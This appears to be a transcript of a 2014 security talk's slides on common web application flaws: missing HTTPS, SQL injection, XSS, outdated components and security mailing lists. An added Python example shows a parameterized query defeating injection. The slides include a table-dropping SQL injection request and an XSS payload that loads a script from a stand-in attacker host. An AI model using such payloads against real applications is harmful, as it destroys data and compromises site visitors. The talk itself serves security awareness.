There Is No Silver Bullet
Harley Watson
November 29, 2014
Transcript
there is no silver bullet Henri Watson
Which vulnerabilities commonly affect web applications in the Dominican Republic?
No HTTPS
Using HTTPS won’t cost you an arm and a leg.
The current proposal for HTTP/2.0 requires TLS.
If you decide to use HTTPS, also use Strict-Transport-Security and ssllabs.com/ssltest
SQL Injections
Request from the client to the server:
GET /tracker?order=12345"; DROP TABLE orders;--
Request from the webserver to the database:
SELECT * FROM orders WHERE order = "12345"; DROP TABLE orders;--" AND status = "pending"
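The order tracker from the slide above, as an added example that is not part of the talk: a string-built query reproduces the SQL shown on the slide, while a parameterized query hands the same request value to the driver as data, so it matches nothing and the table survives. Python with the standard sqlite3 module is assumed, and the column is named order_id rather than the slide's order because ORDER is a reserved word.

```python
import sqlite3

# The value of the order parameter in the slide's GET /tracker request.
SLIDE_INPUT = '12345"; DROP TABLE orders;--'


def make_db():
    """Constructed sample data (not from the talk): an in-memory orders table."""
    conn = sqlite3.connect(":memory:")
    # The slide calls the column "order"; renamed to order_id because ORDER is reserved.
    conn.execute("CREATE TABLE orders (order_id TEXT, status TEXT)")
    conn.executemany("INSERT INTO orders VALUES (?, ?)",
                     [("12345", "pending"), ("12346", "shipped")])
    conn.commit()
    return conn


def vulnerable_query(order):
    """Builds SQL by string formatting, so the request parameter becomes SQL text.

    Returned as a string only, to show what the webserver would send to the
    database; it is never executed here."""
    return f'SELECT * FROM orders WHERE order_id = "{order}" AND status = "pending"'


def lookup_pending(conn, order):
    """Parameterized query: the driver passes the value separately from the SQL,
    so the quote, semicolon and comment marker in it are compared as data."""
    cur = conn.execute(
        "SELECT order_id, status FROM orders WHERE order_id = ? AND status = ?",
        (order, "pending"),
    )
    return cur.fetchall()


def table_exists(conn, name):
    """True if a table with this name is still present in the database."""
    cur = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = ?",
        (name,),
    )
    return cur.fetchone()[0] == 1


if __name__ == "__main__":
    conn = make_db()
    print("concatenated SQL:", vulnerable_query(SLIDE_INPUT))
    print("parameterized lookup:", lookup_pending(conn, SLIDE_INPUT))  # []
    print("orders table still present:", table_exists(conn, "orders"))  # True
```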
Authentication Implementation Mistakes
Cross-Site Scripting (XSS)
Request from the client to the server:
GET /hi?name=<script src="http://evil.example/l33thax.js"></script>
Reply from the server to the client:
Hello, <script src="http://evil.example/l33thax.js"></script>!
Content-Security-Policy
Exposure of Sensitive Data
Using Components With Known Vulnerabilities
Mailing Lists
• bugtraq http://www.securityfocus.com/archive/1
• debian-security-announce https://lists.debian.org/debian-security-announce/
• fulldisclosure http://nmap.org/mailman/listinfo/fulldisclosure
Mailing Lists
• [email protected] https://httpd.apache.org/lists.html#http-announce
• nginx-announce http://mailman.nginx.org/mailman/listinfo/nginx-announce
• php-announce http://php.net/mailing-lists.php
Customer Service
Why is there no “silver bullet”?
Information security is a constant investment.
Heartbleed
By placing your users’ information at risk, you also risk ruining your company’s reputation.
Thanks! @henriwatson
[email protected]
https://henriwatson.com/talks/silverbullet